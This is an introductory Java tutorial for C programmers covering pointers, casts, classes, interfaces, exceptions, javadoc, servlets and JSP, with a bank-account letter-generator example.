languages, such as Smalltalk, use 1 instead of 0 as the index of the first element in
an array).
C variables may also be structures, containing other variables
of different types. For example, the data associated with a bank savings
account might be represented as:
struct savingsAccount {
int balance;
int accountNumber;
char name[30];
};
The individual variables, or members, of the structure are referenced
by qualifying the structure name with the member name:
struct savingsAccount myAccount;
// Initialize the new account
myAccount.balance = 0;
myAccount.number = "1234";
myAccount.name = "Dave Collins";
In addition to
main(), a program can have any number of other
functions:
#include <stdio.h>
int cube(int x) {
return x * x * x;
}
main () {
int i;
for(i = 1; i <= 10; i++)
printf("%i %s %i %s", i, " cubed is ", cube(i), "\n");
}
This example adds the function cube(int x),
which returns x3 and is called from main(),
plus a few other constructs. The expression i++
is common in C; it means "use the value of i,
then increment i by one." The entire
for expression means "start with
i set to 1; use i
in the statement (or block of statements) after the for; increment
i by 1; keep doing this until
i gets to 10; then continue the program after the
for."
The string "%i %s %i %s", first argument
to the printf, is a format definition, which
is required when printing multiple fields; it indicates that the following arguments are to be
printed as integer, string, integer, string. The resulting output is
1 cubed is 1
2 cubed is 8
3 cubed is 27
4 cubed is 64
5 cubed is 125
6 cubed is 216
7 cubed is 343
8 cubed is 512
9 cubed is 729
10 cubed is 1000
The C if and while
control structures resemble the for. Here is an example of
if:
int i, j;
if (i == 0) {
j = 10;
i++;
printf(i);
}
Notice that the equality test in C is ==, and = is used for assignment. Most other operators
are like those in other languages; != means "not equal."
You will frequently encounter in C programs the rather cryptic variant
int i;
if (!i) . . .
instead of
int i;
if (i == 0) . . .
This works because C does not have a boolean type; instead, it uses 0 for false, and
any integer greater than zero for true. Thus !i
means "i is false," which is precisely equivalent to
i == 0. (This code would not be legal in Java, which has a
boolean primitive type, and does not allow
conversion between integers and booleans.)
C, unlike Java or Smalltalk, explicitly differentiates accessing an object directly (by value)
from accessing it through a pointer (by reference). This is illustrated in the following example:
int sum1(int x, int y) {
return x + y;
}
int sum2(int *x, int *y) {
return *x + *y;
}
int result1, result2;
int i, j; int *pi, *pj;
i = j = 10;
pi = &i; pj = &j;
result1 = sum1(i, j);
result2 = sum2(pi, pj);
The variables i and j
are declared as integers and set to 10. The variables pi
and pj are declared as pointers to integers, and set
to the addresses of i and
j (int *pi means
"the object pointed to by i is an integer";
&i means "the address of i").
Pointer references are useful when objects are large, because passing a pointer is faster than
copying the object. They are needed when objects are dynamically allocated, since their locations
are not known at the time the program is compiled.
Java still has the distinction between value and reference, but it
is handled automatically: "primitive" types (such as integers) are always accessed by value,
complex types (objects and arrays) are always accessed by reference. Creation and dereferencing
of pointers is handled "under the covers," so the programmer is not explicitly
aware of it. This results in a significant simplification, which undoubtedly contributes to Java's
popularity.
Pointers allow the programmer to statically compile only a pointer, then dynamically allocate
storage for the creation of data structures or objects at runtime. For example:
struct savingsAccount *myAccount;
int size = sizeof(struct savingsAccount);
. . . .
// Allocate storage for the account
myAccount = (struct savingsAccount *) malloc(size);
myAccount->balance = 0;
myAccount->accountNumber = 1234;
myAccount->name = "Dave Collins";
. . . .
// Free the storage used for the account
free(myAccount);
malloc is a system function for
memory allocation.
Storage gotten with malloc
must be explicitly released using free. Otherwise,
it will be released only when the program ends, and the program may exhaust all the
available storage if large numbers of arrays and structs are created. It is also important that
the storage not be freed while it is still in use.
Notice that whereas a direct structure reference uses dot notation
(e.g., myAccount.balance), structure
reference via a pointer uses an arrow (e.g., myAccount->balance).
The operation in the fifth line of the above example,
(struct savingsAccount *), is
a cast, explained below. It tells the C compiler that what is returned
by malloc, which is a pointer to a
block of storage, is now to be treated as a pointer to a
savingsAccount structure.
Storage management is a major source of errors in C and C++ programs. Java, like
Smalltalk, uses garbage collection and does not permit programmers to manage
storage usage explicitly. The garbage collector runs periodically, and determines
whether any references exist to objects. If not, the objects are deleted and their
storage is freed. The designers of Java argued that the small additional overhead
of garbage collection is a reasonable price to pay in return for not being exposed
to storage allocation and deallocation errors made by programmers.
One more feature of C that is relevant to Java is the notion of a cast. Casting,
or type conversion, changes the type of an object. As an example of why this might
be necessary, the standard C library function
sqrt, which returns the
square root of its argument, takes a floating-point double
as its argument. Suppose we want the square root of an int
- the cast operator (double)
performs the appropriate conversion before calling
sqrt:
int i;
double x, y;
. . . .
i = 5;
. . . .
x = (double) i;
y = sqrt(x);
Casting can be dangerous, particularly in combination with other error-prone
features such as pointers; what will be the result of this code?
#include <stdio.h>
#include <math.h>
main () {
int i, j;
int *pi;
double x, y;
i = 4;
pi = &i;
j = (int) pi; // Casts from pointer to int, to int
x = (double) j;
y = sqrt(x);
printf("%s %i %s %f %s", "Square root of ", i, " is ", y, "\n");
}
The compiler says everything is fine, but the program prints out
Square root of 4 is 1115.818982
In line 9, the programmer casts pi
to int;
pi, defined as "pointer to int", is
a machine memory address, essentially a random number, thus the result.
This error looks implausible in a short program; but in programs containing
thousands of lines of code, perhaps written by several programmers, errors like
this are not uncommon, and notoriously difficult to find.
Java also permits C-type casting. Java compilers are stricter than C compilers
about issuing errors or warnings about dangerous casts, but it is still possible
to create bugs, particularly with primitive types.
Java, like C++, Objective-C, and C#, adds objects, classes, and inheritance to C.
Before delving too deeply into these object-oriented features, let's look
at the syntax of a couple of simple Java programs.
Simple Java programs:
Here is the Java equivalent to the Kernighan and Ritchie "hello world" program:
// A very simple class
public class HelloWorld {
public static void main(String[] argv)
{
System.out.print("hello, world\n");
}
}
There are a few superficial differences, such as the specification of the
argv parameter for the
main() function,
which passes the command-line arguments, if any, that were entered by the user when the
program was started. (argv
is actually used in C too, but need not be specified if there are no arguments
expected. Java is stricter about function signatures.)
A significant difference is that main()
is no longer a free-floating function, it is a method in the class
HelloWorld. Unlike in C (which
does not have classes), or even in C++, functions in Java can only exist as methods
in a class. Another example of this is how the program prints "hello, world".
In C, printf is a function to
print to an output stream; the default output stream is stdout, which is normally
assigned to the console or command window from which a program is executed.
In Java, the standard output goes to an instance of the
PrintStream class. This
instance is stored as a static variable in the
System class. So the fifth
line in the program gets a PrintStream
instance from the variable out
in System and invokes its
print method with the string
"hello, world" as argument.
Notice that there is no #include
statement. The concept in Java that is roughly analogous to
#include is
import, which names a
package and causes the classes from that package to be accessible.
No import is needed
to access System here,
but only because System is
part of the java.lang
package, which is automatically imported for all Java programs. We could have
added
import java.lang.*;
as the first line of the program, but in this special case it is not necessary.
The "*" implies that all classes in a package are to be imported; it is also
possible to import individual classes:
import java.lang.System;
Note that the dot notation used to reference fields and methods in an object is
descended from the dot notation used in a C-language
struct. In fact, one way
to think of a class in Java is as a
struct that has
functions (methods) as well as data fields or members. (In C++, struct
is synonymous with class; Java
does not use the struct keyword.)
Methods and variables defined with the keyword
static
are called class methods and class fields. They are
associated with the class, and do not require creation of an instance. Standalone
programs like this are compiled from source code containing a single public class,
which produces a Java class file (named, in this case,
HelloWorld.class).
The class file is executed from a command like this:
java HelloWorld
Which tells the Java runtime module to look for class file
HelloWorld.class,
and start executing its main
method. (Other ways of executing Java progams, such as the applet we talked about
earlier, are discussed below.)
Here is a more complicated program, similar to the C program above that
prints the cubes of the integers 1-10. This progam adds the functionality
of accepting a command-line argument specifying how many cubes are to be
printed:
public class PrintCubes {
private static int cube(int x) {
return x*x*x;
}
public static void main(String[] argv) {
int i, iterations;
if (argv.length != 0) iterations = Integer.parseInt(argv[0]); // Line 8
else iterations = 10;
for(i = 1; i <= iterations; i++)
System.out.println(i + " cubed is " + cube(i)); // Line 11
}
}
Notice that the function cube
is private, meaning it can only be invoked from within the
HelloWorld class. The
main method must be
public, since it is invoked from outside the class. Java also has a
protected modifier, designating a method that can be invoked from within
the class or from any of its subclasses, but not from unrelated classes.
Line 8 says "if there is a command line argument, assume it is an integer specifying the
number of cubes to be printed". Before unpacking this, a brief digression: Java, for
efficiency and compatibility, retains all the primitive data types of C:
int,double, etc., and even adds
some new ones, such as boolean.
These are not objects, i.e., they are not instances of classes. (Thus Java is
not a "pure" object-oriented language like Smalltalk.) Corresponding to each primitive
type, however, is a class with a similar name:
Integer corresponding to
int,
Boolean corresponding to
boolean, etc. Each of
these classes just "wraps" a primitive value, and adds behavior to it.
The most common use of these wrapper classes is to store primitive objects in
collections. Though the Java primitive array
can hold primitive values, just as in C, instances of the more complex collection
classes (such as ArrayList,
which is used in the banking example below) cannot. These collections must
hold reference, or object, types rather than primitives, thus the need
for wrapper classes.
Another example of added behavior is used in line 8:
argv[0], the first
command line argument, is a string (just as in C). The
Integer class has a
static method parseInt()
that takes a string like "20" as argument and answers the corresponding
int value. Line 8 of the
program uses this to set
iterations
to the command-line argument entered by the user.
Class Integer also has
a constructor function that takes a string as argument, and returns an
Integer
instance that wraps the corresponding int
value. E.g.,
new Integer("20")
instantiates an instance of Integer
wrapping the integer value 20. (The
new operator must
always be used when invoking a constructor.)
The method intValue(), invoked on the
instance just constructed, returns the int 20.
Thus instead of using parseInt(), line
8 of the program could have been coded as
if (argv.length != 0) iterations = (new Integer(argv[0])).intValue();
Note that all the standard "primitive" computational operators such as + require
that their operands be int
values, and will not work with Integer
instances. As mentioned above, there are other contexts (such as holding numbers in collections)
where we need objects, not primitive types; in those contexts we use objects like
Integer and
Double instances rather than
int or
double primitives.
This complicatation is not present in C, or in OO languages such as Smalltalk, which do
not have primitive types at all.
One last point on this program: The + in line 11 is not doing addition,
it is a string concatenation operator. If one of the arguments to + is a
String, and
the type of the result (in this case, the type of the argument expected by
println) is
String, Java
assumes string concatenation and converts the other argument to a String.
(All objects and primitives in Java can be converted to String.)
String concatenation is
the only case where the operator + can be overloaded in this way.
In the example application below, we use instances of another number class,
BigDecimal; in calculating
with BigDecimal, we must use
methods like add() and
multiply(), rather than
primitive operators like + and *. This inability to overload is
a purely syntactic feature of Java; other OO languages, such as C++ and Smalltalk,
do allow overloading of infix arithmetic operators.
Object-oriented programming in Java:
The two programs above, though they are implemented as Java classes, are
not object-oriented in spirit. HelloWorld
and PrintCubes are really just procedural
programs with a veneer of objects. For programmers coming to Java from C or another
procedural language, writing thinly-disguised procedural code is an easy trap to fall into.
As a consequence, the programmer loses the the clarity and structuring capabilities that
constitute the power of object-oriented programming.
A "real" Java progam contains the following elements:
A class with a method that kicks everything off. The method varies;
programs executed from a command line, like
HelloWorld, start from
the main() method.
Applets and servlets, described later, use different methods, but the
basic idea is the same.
A collection of classes, related by inheritance and composition. These
classes are abstractions of the entities in the problem domain relevant to
the program: bank accounts, phone books, folders, contact lists, customers, whatever.
The program creates instances of these classes and sends messages (method invocations)
to them to execute operations. Any instance (object) may create other objects to perform
operations on its behalf. When an instance has no more work to do, the object that created
it will free it, and it will be garbage-collected.
The operation of the programs may cause changes in objects that are
permanently stored in databases. The changed objects may later be rematerialized
by this or another program as Java object instances.
When all the actions of a program have been completed, the "kick-off"
method, e.g., main(), returns
to wherever it was invoked from.
The big picture, which is the same for Java or any other OOPL, is this: In
procedural programs, work is done by passing data to functions; the overall work
of a program is done by a collection of functions derived by "top-down functional
decomposition". In object programs, work is done by message-passing among autonomous
objects, derived by analysis of the entities in the real-world problem domain. Each
object encapsulates both data and functionality, and other objects
know only its interface, not the details of its implementation.
Before looking at an example application (which sends
promotional letters to all the accountholders at a bank), let's examine the
structure of the source code for a Java class, since classes (and their
instances) are the building blocks of all Java programs.
Structure of a Java class:
Here's the outline of a class definition. We'll discuss only the highlights here:
<modifiers> class <class_name>
extends <superclass_name>
implements <interface_name> {
<static field (class variable) definitions>
<field (instance variable) definitions>
<static initializer block>
<constructor method definitions>
<static (class) method definitions>
<(instance) method definitions>
}
The most common modifier for a class is public,
indicating that the class is accessible to any other class in the program. Another common
modifier is abstract, indicating that
the class cannot be instantiated. This is done when a superclass is meant only to provide
common behavior to concrete subclasses (the BankAccount
class below is an example). The final modifier
indicates that a class cannot be subclassed; this is typically done for security reasons.
(The final modifier can also be used for
variables, in which case it means that the initial value set for the variable cannot be changed.
i.e., it is a constant.)
A class extends its superclass.
The classes in the example above, such as HelloWorld,
did not use this keyword. This does not mean they have no superclass; if the superclass is
not specified, it defaults to Object,
so we could have written
public class HelloWorld extends Object {
Passing over (for the moment) the meaning of implements,
we come to class and instance field (also called variable) definitions, which look like this:
<modifiers> <variable type> <variable name>;
These are comparable to data definitions
in C, but with added modifiers like public,
private, and
protected, which have the same
meaning as described above for methods (i.e., they control the scope of visibility of
the variable).
A static initializer block is an unnamed block of code inside brackets ( { and } )
that is executed once when the class is loaded. It is used, if necessary, to perform
complex initializations such as setting up tables, etc.
Next we find definitions of constructors, which are like methods with the same
name as the class, used to initialize new instances. Constructors are defined
with no explicit return type, since they always return an instance of the class in which they
are defined. (An example of a class with more than one constructor is shown below.)
Constructors are always invoked with the new
operator, e.g., for the class Point,
which can take as constructor arguments the x and y coordinates of the point:
Point originPoint = new Point(0, 0);
Finally, there are method definitions; those defined as static
are class methods, the remainder are instance methods. These look a lot like C function
definitions, except for the modifiers and the fact that functions in Java are always defined as methods within
the body of a class definition:
<modifiers> <return type> <method name>(<argument definitions>) {
<method code>
}
There is one extra "hidden" parameter passed to any
instance method, which is the particular object that is the "message receiver". This
object can be explicitly identified within the method body as
this, though it is usually not
necessary; any method invocation that does not explicitly identify the receiving
object automatically goes against this.
So these two lines of code within a method produce identical results:
public int fooMethod {
result = doIt();
result = this.doIt();
. . . .
Java interfaces and dynamic binding:
The keyword implements in a class definition
refers to a Java interface. An interface is a specification of methods that can be implemented
by any class. Interfaces can be used to document the "contract" that must be fulfilled by
certain objects. They are also essential for the general use of dynamic binding in Java. Recall that
dynamic or "late" binding is deferring the decision on which class a method comes from until
runtime. (The resulting behavior is called polymorphism.) An example is the method
toString(), which renders an object as
a string, usually for printing.
This method is defined in class Object, and
overridden in subclasses. Note the two invocations of
toString() in this code fragment:
Object printable;
TreeSet setOfInt = new TreeSet();
setOfInt.add(new Integer(1));
setOfInt.add(new Integer(2));
setOfInt.add(new Integer(3));
printable = new Integer(5);
System.out.println(printable.toString());
printable = setOfInt;
System.out.println(printable.toString());
Though printable is defined as
Object, the first occurrence invokes
toString()
in Integer (which prints
5), the second
invokes it in TreeSet (which
prints [1, 2, 3]. The choice of
method is based on the class of the actual object assigned to
printable.
The example just given depends only on inheritance; the compiler knows that
a valid toString() method
will exist at runtime for the class of the printable
object, because there is a default implementation of
toString()
in class Object.
Now let's look at an example that requires interfaces.
The TreeSet
class used above is a set (collection with no duplicate members) whose elements
can be iterated in order. To maintain its elements in sorted order,
TreeSet requires
that they support a method that allows two elements to be compared
to see which one goes first (this is essential for any sort algorithm).
The particular method that's used is
compareTo().
How can a TreeSet
guarantee that any object added to it supports
compareTo()?
It is not reasonable to just implement compareTo()
in class Object, because
some objects have no natural ordering. It's not even reasonable to make
all objects with a natural ordering inherit from something like
ComparableObject, because
comparability is just one small property among many similar ones that might
demand similar treatment; since Java only supports single inheritance,
a class could only inherit one of these properties.
Java's solution is interfaces. Though a class can inherit from only one superclass,
it can implement many interfaces. So a
TreeSet does not specify
any particular class for its elements, but requires that they implement the
Comparable interface.
The method that actually does the comparison (somewhat simplified) looks like
this:
// Compare two keys using the correct comparison method
private int compare(Object k1, Object k2) {
return ((Comparable)k1).compareTo(k2);
}
If the object being added does not implement
Comparable, the
cast (Comparable)k1
will fail. Similarly, in the following code line 2 is OK because class
Integer implements
Comparable, but line 3 will
cause an error because class Object
does not:
Comparable c, d;
c = new Integer(1);
d = new Object();
Thus in terms of type-checking, interfaces work just like classes,
but avoid the complexity of multiple inheritance. Other examples
of commonly-used interfaces in Java include
Collection,
which specifies the required interface for objects that hold collections
of other objects, and Serializable,
for objects that can render themselves as streams of bytes (e.g., for transmission
on a network or storage in a file).
Two example classes:
Here are two complete source files for Java classes used in the
sample application below:
BankAccount
and its subclass SavingsAccount.
They illustrate many of the points discussed above. Both classes import
java.math.* in order to
use the BigDecimal class,
which models fixed-point decimal numbers such as account balances. Because
BankAccount implements the
Comparable interface,
it must have a compareTo()
method, which in this case sorts by account number. The constructor insures that
the variable active is
always set in a new BankAccount.
import java.math.*;
public abstract class BankAccount implements Comparable {
private boolean active;
private BigDecimal balance;
private String accountNumber;
private Name name;
private Address address;
BankAccount() {
active = true;
}
public BigDecimal close() {
BigDecimal result = balance;
setBalance(new BigDecimal(0.0));
active = false;
return result;
}
public int compareTo(Object anObject) {
return
getAccountNumber().compareTo(((BankAccount)anObject).getAccountNumber());
}
public void deposit(BigDecimal anAmount) {
setBalance(getBalance().add(anAmount));
}
public String getAccountNumber() {
return accountNumber;
}
public abstract String getAccountType();
public Address getAddress() {
return address;
}
public BigDecimal getBalance() {
return balance;
}
public Name getName() {
return name;
}
public abstract BigDecimal getWithdrawalLimit();
public void setBalance(BigDecimal anAmount) {
balance = anAmount.setScale(2, BigDecimal.ROUND_HALF_DOWN);
}
public boolean isActive() {
return active;
}
public void setAccountNumber(String aNumber) {
accountNumber = aNumber;
}
public void setAddress(Address anAddress) {
address = anAddress;
}
public void setName(Name aName) {
name = aName;
}
public boolean withdraw(BigDecimal anAmount) {
boolean result;
if (result = (getWithdrawalLimit().compareTo(anAmount) > 0 ))
setBalance(getBalance().subtract(anAmount) );
return result;
}
}
Notice that BankAccount is abstract,
and it has two methods declared
abstract. These methods must
be implemented by any concrete subclass of
BankAccount, and they
are indeed implemented in the
SavingsAccount subclass:
import java.math.*;
public class SavingsAccount extends BankAccount {
private static final String ACCOUNT_TYPE = "S";
private static double interestRate;
public static void setInterestRate(double rate) {
interestRate = rate;
}
public static double getInterestRate() {
return interestRate;
}
SavingsAccount() { }
public String getAccountType() {
return ACCOUNT_TYPE;
}
public BigDecimal getWithdrawalLimit() {
return getBalance();
}
public void postInterest() {
double interest = getBalance().doubleValue() * getInterestRate();
setBalance(getBalance().add(new BigDecimal(interest)));
}
}
Another thing to notice about the relationship between
BankAccount and
SavingsAccount is that
all the instance variables in
BankAccount are declared as
private. This means
that they cannot be accessed from outside the class, not even by its subclasses.
Thus if the getWithdrawalLimit()
method in SavingsAccount
were coded like this:
return balance;
it would cause a compiler error.
BankAccount
supplies get...()
and set...()
methods for all its instance variables to help insure that they are
used correctly. There are sometimes good reasons for classes to expose
their instance variables to subclasses, or even to expose them to the
world by declaring them as
public; one occasionally
sees a Java class that looks like a C
struct, with public
instance variables and no methods. But generally, such a lack of encapsulation
reflects poor design.
The static class variable ACCOUNT_TYPE
is declared final, so it cannt
be changed. interestRate
is also static, since it is common to all instances of
SavingsAccount, but
it can be changed by using the static method
setInterestRate().
More information on these classes and the others from the sample
application can be found in the
javadoc
for the application.
An example application:
Let's take a simple example. A bank occasionally sends informational or
promotional letters to all its accountholders, or to all holders of a particular
kind of account, such as savings. We want a program that will produce printed
letters and addressed envelopes based on the following inputs:
Criteria defining which accountholders should receive the letter.
The name of a file containing the text of the letter.
Classes involved in this problem (representing "real-world" entities) include
BankAccount, subclasses
such as SavingsAccount,
Name and
Address (sub-objects of
BankAccount),
Letter,
Envelope,
and various "technical" classes representing files, databases, etc.
The example code has been radically simplified to make a
compact example, but it is a fully working application. Some of the things that are missing, such
as exception handling, are discussed below. The design has also been simplified;
for example, it would be preferable to use XML as a template for the
letter text, making it easy to plug in names, salutations, etc. Lots of
code for validity-checking inputs is also missing. But the example as given
is sufficient for illustrative purposes.
Here is a diagram of the classes and relationships involved in this application,
using the conventions of the industry-standard
UML (Unified Modeling Language):
LetterGenerator contains
the sequencing logic for the program. It uses the standard Java classes
FileInputStream and
FileOutputStream for
reading in the "boilerplate" letter text, and printing the content of the
envelopes and letters. (In a more complete application, a subsequent process would
take the output file and physically print the envelopes and letters.)
BankAccountFile
represents access to the database in which bank accounts are stored. In this
sample application, it merely returns a small collection of test accounts.
Note the use of a static initializer block to initialize the test accounts.
BankAccount, described above,
is the abstract superclass for
SavingsAccount and
CheckingAccount.
Bank accounts have instances of
Name and
Address
to store information on the account owner. Notice the three different constructors
in Name: One taking no arguments,
one taking a string that is parsed into its components, and one taking three strings
for title, first name, and last name. You might wonder why
Name and
Address are classes, and
not just strings stored in BankAccount.
Either implementation is possible, but making them separate classes simplifies
the coding of BankAccount, and
also makes the Name and
Address classes available
for use in other contexts. (Click on the links to see the
Java class definition files.)
Here is a UML sequence diagram showing the flow of messages between objects
in the process implemented by
LetterGenerator:
The objects involved are along the top axis of the chart.
(Iterator
is a Java interface defining iteration over a collection. You can think of it as
a pointer, or cursor, ranging over the elements in the collection.)
Messages (method invocations) from one object to another are indicated
by lines with an arrow; the object returned is shown by an arrow with a small
circle at the origin. The sequence (time flow)
is from top to bottom. An arrow from an object to itself indicates method
invocation or iteration within the same object; in that case, the lines of the
arrow are drawn to bracket the code that is being executed. In some cases,
pseudocode such as "while more accounts" is used to summarize what's going on.
The "actor" icon in the upper left indicates that the process is kicked off by
a user invoking the program with parameters specifying the boilerplate text,
and which accountholders are to be sent the letter. For example,
java LetterGenerator letter.txt S > lettersOut.txt
invokes the program to send the text of
letter.txt to the
holders of savings accounts, and print the result to
letter.txt.
These UML charts use a somewhat simplified form of the full notation.
Purists may object, but we feel that it is a waste of time and paper to
produce diagrams at an unnecessary level of detail. For Java in particular,
a small number of high-level diagrams in UML or similar format, plus
conscientious use of javadoc,
seems to be optimal in terms of value for time expended in documentation.
Exception handling in Java:
The PrintCubes program above
expected one command-line argument, an integer specifying the number
of cubes to print. The parameter is entered as a string, passed to the
program, and converted to an integer:
iterations = Integer.parseInt(argv[0]);
What if the user makes an error and enters, say "t" instead of "5"? The result will
be an output like this:
Exception in thread "main" java.lang.NumberFormatException: t
at java.lang.Integer.parseInt(Unknown Source)
at java.lang.Integer.(Unknown Source)
at PrintCubes.main(PrintCubes.java:8)
This is not a very obvious way of telling the user that "t" is not a valid parameter.
What has happened is a Java
NumberFormatException in the
process of trying to convert "t" into an integer. Since we can readily anticipate
this kind of error, we'd like to catch it and present a friendlier message to the
user. Java exception handling supports that, as shown in the following revised
initialization of iterations:
if (argv.length != 0) {
try {iterations = (new Integer(argv[0])).intValue();
}
catch(NumberFormatException exception) {
System.out.println("Usage: PrintCubes <number of iterations>");
System.out.println(" <number of iterations> must be an integer");
System.exit(0);
}
}
else iterations = 10;
The try block is the code in
which we anticipate that an exception may occur; the immediately following
catch block specifies which
kind of exception is anticipated, and contains the code to be executed if it occurs:
In this case, print an error message and exit. The error message presented to the user is now:
Usage: PrintCubes <number of iterations>
<number of iterations> must be an integer
If a method in a Java class anticipates an exception, but wants the method caller to
handle it, it may announce that fact by using the
throws keyword. As an example,
many methods in BufferedReader
and FileInputStream throw
IOException, for instance if a file
encounters a physical I/O error. The caller must decide what to do if this happens,
so methods are coded in FileInputStream
like this:
public int read(byte b[]) throws IOException {
. . . .
If a method throws an exception, any method that invokes it must either
have a catch block
identifying the exception, or announce that it throws the exception so
that its caller can handle it. If not, a compiler error will result.
You may have noticed an example in the code for
LetterGenerator: The
run()
method invokes methods in FileInputStream
but does not catch IOException,
so it throws it to its caller. The main()
method, which invokes run(),
also does not catch IOException,
so it must throw it. Ultimately, if there is no catcher, the exception causes
the program to terminate and print several error lines like what we saw above. In real
applications, the IOException
should be caught somewhere, at least for the purpose of printing a more
meaningful error message.
Documenting Java code with javadoc:
The javadoc program, supplied
with the Sun JDK, is, in our opinion, the best documentation tool ever developed
for programs. Most documentation schemes fail because they are too complex, require
too much work on the part of programmers (who really just want to get code working),
or maintain the documentation in separate files which must be (but rarely are)
updated when the code is changed. javadoc
generates documentation directly from the code, and requires only a modest investment
on the part of the programmer to produce a useful result.
There are three kinds of comments that can be used in Java code:
// This is a single-line comment.
/* This is
a multiline comment. */
/** This is
a javadoc comment. */
The third comment looks to the compiler like an ordinary multiline comment,
but the extra * flags it as meaningful to
javadoc. These comments,
along with the actual structure of the Java code, are used to generate
HTML documentation.
The best way to see how this works is to look at the
actual javadoc documentation,
along with the comments placed in the class source code files
(
LetterGenerator,
BankAccountFile,
BankAccount,
SavingsAccount,
CheckingAccount,
Name, and
Address).
Java Programs, applets, Java server pages, and servlets:
In addition to standalone Java programs, there are two types of programs associated
with the World Wide Web: Applets, encountered above, which are downloaded
and executed under control of the client web browser; and servlets, which
are invoked by HTML pages and run on the web server. Whereas
standalone programs are always entered via the
main() method, other methods must
be coded for applets and servlets.
An applet is invoked from an HTML page by code like this:
<applet code=MyApplet.class>
<param name=parameterName value=parameterValue>
. . . .
</applet>
MyApplet.class is the
name of the class file output by the Java compiler, and is downloaded to the
client. The applet code must be a subclass of
Applet. Methods that
applets typically override from Applet
include init(),
called by the browser to tell the applet that it has been loaded into the system;
start(),
called by the browser to tell the applet that it should start executing;
and stop(),
called by the browser to tell the applet that it should stop executing.
Applet, its superclasses,
and other Java classes provide a wealth of functionality to build applets
that provide graphics, sound, image display, animation, and other capabilities.
A servlet is also invoked by HTML code, typically resulting from some user
action such as submitting a form. The servlet runs on the server, though, not
on the client. Here is an example of servlet incovation:
<form action="/servlets/MyServlet" method="post">
This is similar to the invocation of a
CGI (Common Gateway Interface) script. MyServlet.class
must be the name of a class file containing a class named
MyServlet, which
must be a subclass of HttpServlet.
The server invokes the servlet through its
doGet() or
doPost() method,
depending on whether the action specified in the HTML is
get or
post. The servlet
then performs whatever action is appropriate (e.g., searching a
database), builds an HTML response, and sends it back to the client browser.
Java code can also be imbedded directly in HTML, using
Java server pages (JSPs), much like a scripting language. Here is
a very simple example; <% and
%> bracket the Java code:
<html>
<head>
<title>JSP example</title>
</head>
<%
out.print("Hello! It is now ");
out.print(new java.util.Date());
%>
</body>
</html>
This outputs a line like
Hello! It is now Fri Jul 05 23:43:56 MDT 2002
Unlike client-side scripting, an HTML page with embedded JSP code is converted and compiled
on the server into a servlet class and executed. (If you're interested, here is the
servlet Java code generated for this example by the
Apache Tomcat server.)
There is some
skepticism about JSP. Much of this boils down to the same thing that can be said of
ASP, client-side JavaScript, and other scripting technologies used on the web: Web pages
are necessarily dedicated to presenting a user interface, and mixing application logic
with UI code is bad practice. To this can be added the facts that HTML pages in general, and
JSP in particular, have very little structuring capability, and that web page coding
is often done by people with very little programming experience. All in all, JSP needs to be used carefully
if you expect to build a reliable and maintainable web site.
* * *
* * *
* * *
We have now briefly covered the high points of the Java language.
There are many aspects of programming in Java, ranging from Java Beans to inner classes to
user interface programming, that are beyond the scope of this short tutorial. For these,
we refer you to the links below. For programming practice, the basic tools, including good
graphical IDEs (Integrated Development Environments) are free or reasonably priced. Enjoy!
For a comparison of corresponding terms and concepts in
in Java, Smalltalk, and C++, and pointers to information about
other OOPLs, see the
OOPL comparison chart.
Dick Baldwin's Java page
has links to other information sources and an extensive set of Java
tutorials.
Gamelan
has links to various Java resources including articles, tutorials,
and source code.
Java 2 SDK from Sun.
Java 2 Enterprise Edition SDK from Sun. This is needed for servlets, among other things.
Forte (JDK) Java IDE from Sun. The "community edition" is free.
Eclipse, a highly-rated open-source IDE.
Jars.com Java download repository.
Coding "style" is usually more than style, and following the style of those
who are acknowledged experts is a good learning experience. Even where style is
just style, picking a style and using it consistently enhances the readability
of your code; using one style for all code written by a development team helps
convey a professional, "quality" approach to coding.
Looking at several style guides is a good exercise. Seeing what the issues
are, and getting different perspectives on them, will help in evolving a guide
that's right for your team.
Java Programming Style Guidelines by Geotechnical Software Services. These guidelines are based on standards from a number
of other sources, including Sun. They are concise, well-organized, and provide a rationale for each guideline.
Geotechnical Software Services'
home page contains other useful Java links.
Sun's recommended
Code Conventions for the Java Programming Language.
AmbySoft's
Coding Standards for Java, by Scott Ambler, who's also the lead author of
The Elements of Java Style, a book on Java coding style.
Draft Java Coding Standard by
Doug Lea. Doug teaches computer science at SUNY Oswego, and is a well-known C++ and Java expert.
Javadoc is Sun's standard way of documenting Java code. We highly recommend
using it, because unlike most other documentation schemes, the documentation
is based on special comments in the code itself, thus is more likely to be
kept up to date.
One of the "problems" frequently cited regarding Java versus C or C++ is performance.
This is now largely a myth; Java performance with current technology is adequate for the vast
majority of applications. Slow Java code is much more likely to be a result of poor design
than the wrong choice of language. If you do encounter performance problems,
Java Performance Tuning by Jack Shirazi. In addition to lots of tips on optimizing
code, the book also provides a methodology for analyzing performance problems, so you don't
waste time optimizing the wrong things. The book is also good "preventive medicine" for anyone
writing Java code for performance-sensitive applications. | http://www.outbacksoftware.com/java/java.html | crawl-002 | refinedweb | 8,244 | 51.68 |
Computational feces.
I used to think that PHP was the biggest, stinkiest dump that the computer industry had taken on my life in a decade. Then I started needing to do things that could only be accomplished in AppleScript.
Tags: computers, firstperson, mac
66 Responses:
never try AppleScript but I'm pretty sure you're not alone!
It's true. At least PHP has something approaching a grammar.
(I actually kinda like the event+object model that Applescript is an interface to— you can talk AppleEvents from saner languages using things like python appscript (pretty sure there are equivalents for your major scripting language of choice).)
I once found myself writing a desktop publishing automation app with AppleScript. Shortly before going insane I discovered appscript, a Python (and now Ruby and Objective-C, apparently) library that exposes the underlying Apple Events mechanism and scripting dictionaries in a reasonable way. Anything you can do with AppleScript, you can do with appscript, and that way you get to use a programming language with fancy things like stack traces! It's been years since I touched it, but it was a godsend.
Wow. I had no idea this existed, and opens up a bunch of opportunities for me to half-start projects, and then abandon them prior to completion.
Mac::AppleScript::Glue apparently does the same thing in the Perl/CPAN world.
So you have never had to write a .bat script?? Lucky man!
I completely agree; that's why I wrote Python classes that wraps around appscript. So, that way, I'm Applescripting in Python in ways that make total sense.
Too true. The applescript language itself is a horror to try to write in, though it's actually fairly easy to read. If perl is sometimes accused of being a "write-only" language, applescript is "read-only".
As others have said, the model and feature-set under the language is actually pretty decent. If you need to use it without going mad, appscript is the way.
Perhaps your hacks page needs an update, since it still claims "PHP is kinda cool."
;)
No, that's some other three-letter punk, not me.
...oh yeah. That's what I get for logging on before breakfast.
Last time I checked, JavaScript was a fully supported alternative for those APIs. That doesn't necessarily make them less horrible, though. :D
Huh?
You can use JavaScript to automate AppleScriptable applications using JavaScript.
